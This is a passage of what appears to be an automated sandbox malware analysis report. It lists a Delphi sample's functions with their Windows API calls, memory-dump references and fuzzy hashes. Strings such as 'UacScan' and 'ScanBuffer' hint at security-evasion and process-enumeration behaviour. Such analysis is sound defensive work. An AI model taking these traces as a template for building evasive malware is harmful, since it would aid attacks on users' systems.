                                                                                                                                        • Part of subcall function 02C35A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C35AEE
                                                                                                                                        • Part of subcall function 02C35A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02C35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C35B37
                                                                                                                                        • Part of subcall function 02C35A78: RegQueryValueExA.ADVAPI32(?,02C35CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02C35B7D,?,80000001), ref: 02C35B55
                                                                                                                                        • Part of subcall function 02C35A78: RegCloseKey.ADVAPI32(?,02C35B84,00000000,?,?,00000000,02C35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C35B77
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2796650324-0
                                                                                                                                      • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                      • Instruction ID: e5ff093e4fc6e4d3ad24ce9c13cb91ec35385804c5dab0c24c612c3925239daa
                                                                                                                                      • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                      • Instruction Fuzzy Hash: CBE06DB1A402148FCB11DE5888C0AA637D8AF08790F440965EC58DF34AD3B0DA109BD1
                                                                                                                                      Function 02C37D9C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02C37DB0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                      • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                      • Instruction ID: 889a4e43277026b240868d4baea2f3c48c1df0fa0f1efa9d6fdaf662c5eb5097
                                                                                                                                      • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                      • Instruction Fuzzy Hash: 56D05BB23081107AD220A95A6C44EB75BDCCBC9770F100A39B658C7180D7208C058671
                                                                                                                                      Function 02C37E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,02C4F8CC,ScanString,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanString,02C9137C,02C5AFD8,UacScan,02C9137C,02C5AFD8,UacInitialize), ref: 02C37E23
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      • Opcode ID: 5a31bfd882717e19bfdba3f43ec11c401b22dfbb3a9782c9602b5cd3cc3c38d2
                                                                                                                                      • Instruction ID: a58e83413309cfa454b5d7fe7d7cf59415d54b701836de4b641e666d4065c17f
                                                                                                                                      • Opcode Fuzzy Hash: 5a31bfd882717e19bfdba3f43ec11c401b22dfbb3a9782c9602b5cd3cc3c38d2
                                                                                                                                      • Instruction Fuzzy Hash: 8BC08CE22023400E6A66A1FC0CC400A42CC09842383A40F35B038CABD2D321882A3410
                                                                                                                                      Function 02C37E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,02C52A49,ScanString,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,Initialize), ref: 02C37E47
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      • Opcode ID: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
                                                                                                                                      • Instruction ID: 199cef5d8018864acb1155c60cd2caf9ec10bdb8739f89b4b6dbd34833971152
                                                                                                                                      • Opcode Fuzzy Hash: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
                                                                                                                                      • Instruction Fuzzy Hash: B3C08CE12023040E9E62A2FC1CC029A42CE09842343A01F31E038DA2C2D311D82A3410
                                                                                                                                      Function 02C34C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3341692771-0
                                                                                                                                      • Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                                                                      • Instruction ID: 5b2e2b8d1dc7300591a28de7ee878c7587a456f6a32caa9c7c20d692e4c3323b
                                                                                                                                      • Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                                                                      • Instruction Fuzzy Hash: 01C012A26006244BEF365A98ACC075562CCEB45295B1808A1D408D7241E3A59D005664
                                                                                                                                      Function 02C5BB50 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • timeSetEvent.WINMM(00002710,00000000,02C5BB44,00000000,00000001), ref: 02C5BB60
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Eventtime
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2982266575-0
                                                                                                                                      • Opcode ID: 6b548baeca0453b3e3ce3a4510edb24106d852d0e79c2b400c09e3d0635d55c8
                                                                                                                                      • Instruction ID: 887e39ef9f47c15df440cd5ab5bc95ecdc0d6457186d6fec34aa39f12ea3d494
                                                                                                                                      • Opcode Fuzzy Hash: 6b548baeca0453b3e3ce3a4510edb24106d852d0e79c2b400c09e3d0635d55c8
                                                                                                                                      • Instruction Fuzzy Hash: 10C092F07907003EF6215AA83CC2F27A69EE304B04F600812BA00FE2D5E5E28DA01A39
                                                                                                                                      Function 02C34BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02C34BEB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2525500382-0
                                                                                                                                      • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                                      • Instruction ID: a12e6687503f4f8a56d838369e10c7508eea3b0de02f6a3317b8ccfa058e721d
                                                                                                                                      • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                                      • Instruction Fuzzy Hash: FEB0123C2486021CFE3B19620D00BB2008C1BD128FF880CD1DE28C80C0FF41C510D833
                                                                                                                                      Function 02C34BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 02C34C03
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3341692771-0
                                                                                                                                      • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                      • Instruction ID: e9e7741e483dda9e92196444a58a30573ea471295172142ff39caa4f87bd1d67
                                                                                                                                      • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                      • Instruction Fuzzy Hash: 11A022AC000B030E8F2F232C000002A20333FE03023CECCE800000A0008FBBC000BC30
                                                                                                                                      Function 02C31682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02C316A4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: c39dc506a2080a4f4d3db881be5c9989287ae25da64babd5519c1bad543f1b07
                                                                                                                                      • Instruction ID: b471c48be64b405248945a8f34c600b32e5a70795c95494bde1456db807f8b95
                                                                                                                                      • Opcode Fuzzy Hash: c39dc506a2080a4f4d3db881be5c9989287ae25da64babd5519c1bad543f1b07
                                                                                                                                      • Instruction Fuzzy Hash: C2F0BEB2B407956FD7119F9A9C84B82BBA4FB40324F094639FA4C9B340D7B1A8108FD4
                                                                                                                                      Function 02C316E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02C31FE4), ref: 02C31704
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                      • Opcode ID: ca35f61e19a4b9bb2ec51766c9aa90f94c48329498dd4907322e569945ba5965
                                                                                                                                      • Instruction ID: eb75f634446360a051d74bbbbfccfbc7fc795e5c8a5f741b5beb444d151d904e
                                                                                                                                      • Opcode Fuzzy Hash: ca35f61e19a4b9bb2ec51766c9aa90f94c48329498dd4907322e569945ba5965
                                                                                                                                      • Instruction Fuzzy Hash: BBE086753003016FD7115A7A5D447126BD8EB45664F1C4875F549DB241D6E0E8108B60

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 02C4A95C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C4ABE3,?,?,02C4AC75,00000000,02C4AD51), ref: 02C4A970
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C4A988
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02C4A99A
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02C4A9AC
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02C4A9BE
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02C4A9D0
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02C4A9E2
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C4A9F4
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02C4AA06
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02C4AA18
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02C4AA2A
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02C4AA3C
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02C4AA4E
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02C4AA60
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02C4AA72
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02C4AA84
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02C4AA96
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                      • API String ID: 667068680-597814768
                                                                                                                                      • Opcode ID: 6452c0c4dfdb770c6f72db19ebeeefc0e779506ec3cc7910a07f9102dce54483
                                                                                                                                      • Instruction ID: 962f7272925ca694ecc12bd68b80f695177286f2d73d7a357525657c246b1a75
                                                                                                                                      • Opcode Fuzzy Hash: 6452c0c4dfdb770c6f72db19ebeeefc0e779506ec3cc7910a07f9102dce54483
                                                                                                                                      • Instruction Fuzzy Hash: AC31D8B0AC0B21AFFB02EFB4D89AB2737BDAB067407550E65A406CF204DBB499509F55
                                                                                                                                      Function 02C358B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,02C36BD0,02C30000,02C5D790), ref: 02C358D1
                                                                                                                                      • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02C358E8
                                                                                                                                      • lstrcpynA.KERNEL32(?,?,?), ref: 02C35918
                                                                                                                                      • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02C36BD0,02C30000,02C5D790), ref: 02C3597C
                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02C36BD0,02C30000,02C5D790), ref: 02C359B2
                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02C36BD0,02C30000,02C5D790), ref: 02C359C5
                                                                                                                                      • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C36BD0,02C30000,02C5D790), ref: 02C359D7
                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C36BD0,02C30000,02C5D790), ref: 02C359E3
                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C36BD0,02C30000), ref: 02C35A17
                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C36BD0), ref: 02C35A23
                                                                                                                                      • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02C35A45
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                      • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                      • API String ID: 3245196872-1565342463
                                                                                                                                      • Opcode ID: d768e941307ffe9c2d1d2afc854c574cf7a82d912740b79ed6c093eced68cb7d
                                                                                                                                      • Instruction ID: 4da09510a0d4f26fc9ba289523f4a484432ee27b2a4bc2e553553a0024434cb1
                                                                                                                                      • Opcode Fuzzy Hash: d768e941307ffe9c2d1d2afc854c574cf7a82d912740b79ed6c093eced68cb7d
                                                                                                                                      • Instruction Fuzzy Hash: 66417FB1D40259AFDB12DAE8CC88AEEB3BDAF48390F4849A5E548E7241D7709B44DF50
                                                                                                                                      Function 02C35B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C35B94
                                                                                                                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C35BA1
                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C35BA7
                                                                                                                                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C35BD2
                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C35C19
                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C35C29
                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C35C51
